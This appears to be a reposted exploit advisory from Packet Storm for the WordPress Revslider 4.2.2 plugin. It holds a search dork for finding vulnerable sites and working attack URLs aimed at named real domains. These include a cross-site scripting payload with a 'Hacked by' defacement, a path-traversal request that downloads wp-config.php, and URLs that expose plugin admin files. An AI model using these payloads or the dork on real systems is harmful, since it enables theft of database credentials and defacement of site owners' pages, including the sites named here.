WordPress Revslider 4.2.2 XSS / Information Disclosure

Posted on Posted in Exploit

WordPress Revslider plugin version 4.2.2 suffer from cross site scripting, file download, and information disclosure vulnerabilities. Note that this finding houses site-specific data.

Quelle: Packet Storm Security

| # Title    : WordPress Revslider 4.2.2 Multi Vulnerability
| # Author   : indoushka                                                               
| # email    : indoushka4ever@gmail.com                                                                                                                                                                 
| # Dork     : inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
| # Tested on: windows 8.1 Français V.(Pro)        
| # Download : http://revolution.themepunch.com/                                                  
=======================================

XSS :

http://www.codekom.com//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka..Give%20me%20your%20wp-config.php

information Disclosure :

http://www.codekom.com/wp-content/plugins/revslider/revslider_admin.php

http://www.codekom.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

Arbitrary File Download Exploit :

http://bh-3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------
Facebooktwittergoogle_plus